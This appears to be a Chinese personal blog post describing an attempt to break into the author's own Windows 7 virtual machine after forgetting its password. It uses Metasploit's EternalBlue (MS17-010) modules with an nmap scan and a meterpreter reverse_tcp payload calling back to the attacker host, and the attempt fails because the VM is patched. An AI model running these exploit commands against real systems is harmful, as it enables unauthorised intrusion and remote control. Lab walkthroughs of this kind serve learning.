今天用虚拟机的时候发现忘记密码了,服了,打一下,顺便记录一下sb经过。
最后是通过其本身镜像解决,或者用u盘做一个PE


✅第一步:工具准备
- kali (
msfconsole美少妇
)
✅第二步:漏洞扫描
nmap -p 445,3389 192.168.200.0/24 -O

本来想用08_067,改用永恒之蓝
✅第三步: MS17-010
🔎 打开Metasploit控制台
msfconsole
🔎查找漏洞模块
search eternalblue



👉 推荐选择
-
第一次打:选择 0
use exploit/windows/smb/ms17_010_eternalblue //use 0
这是最经典、最直接的永恒之蓝利用方式,最常用。
👉 0 模块打不进去:
-
选择 1
use exploit/windows/smb/ms17_010_psexec //use 1
它结合了 SMB 执行与永恒之蓝漏洞,有时能绕过部分系统限制。
👉 只检测:
-
选择 3
use auxiliary/scanner/smb/smb_ms17_010 //use 3
检测目标是否存在漏洞
👉 如果目标已经被种下 DoublePulsar 后门:
-
选择 4
use exploit/windows/smb/smb_doublepulsar_rce //use 4
利用植入的后门远程执行代码。
最佳顺序推荐(保险打法):
-
先用
auxiliary/scanner/smb/smb_ms17_010
扫描确认 -
用
exploit/windows/smb/ms17_010_eternalblue
打 -
如果不成功,改用
exploit/windows/smb/ms17_010_psexec
像不正常情况下像我就是知道win7并且开启了445我就直接打了先说
🔎找到后使用
use exploit/windows/smb/ms17_010_eternalblue //use 0
🔎在 Metasploit 中,如果你想查看当前模块有哪些可设置的参数(选项),需要用命令:

设置攻击参数
cs
set RHOSTS 192.168.200.128
set LHOST 你的攻击机IP
set LPORT 4444 # 端口随意,一般用 4444
set payload windows/x64/meterpreter/reverse_tcp
⚠ 如果目标系统是 32 位,可以改用:
cs
set payload windows/meterpreter/reverse_tcp
查看配置是否正确:
cs
show options

发起攻击
cs
exploit
打不进去

选系统

还是打不进去

🔎为什么Win7(2009_2025)、开启445,结果却显示"不存在漏洞"?

🔎如何验证 SMBv1 是否真的开启?
可以用 smbclient
工具列出 Windows 共享**:**
cs
smbclient -L //192.168.200.128 -N

如果 State
是 Disabled
,那就无法利用永恒之蓝。
如果确认 SMBv1 被禁用,可以尝试:
攻击 SMBv2 协议相关漏洞,如:
SMB Signing 绕过
MS17-010 失败后可以尝试 ms17_010_psexec (编号1的模块)
cs
use exploit/windows/smb/ms17_010_psexec

报错
cs
[-] 192.168.200.128:445 - Unable to find accessible named pipe!


|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 放弃,永恒之蓝(EternalBlue)利用的是 SMBv1 协议的漏洞(MS17-010),如果目标没有开启 SMB 服务(即使开放了 445 端口),那么永恒之蓝也无法成功利用。 #### 关键点: * 445端口开放:端口 445 本身只是 SMB 服务的端口,表示目标机器上可能开放了 SMB 服务,但并不意味着 SMB 服务一定处于可用状态。如果没有启用 SMB 服务,攻击就无法进行。 * SMB 服务:攻击需要依赖 SMB 服务中的"命名管道"来进行漏洞利用。如果目标关闭了 SMB 服务或没有开放可用的命名管道,那么漏洞无法被触发。 总结起来,如果目标没有开启 SMB 服务,即使 445 端口开放,永恒之蓝也无法攻击成功 |
这个win7是打补丁的。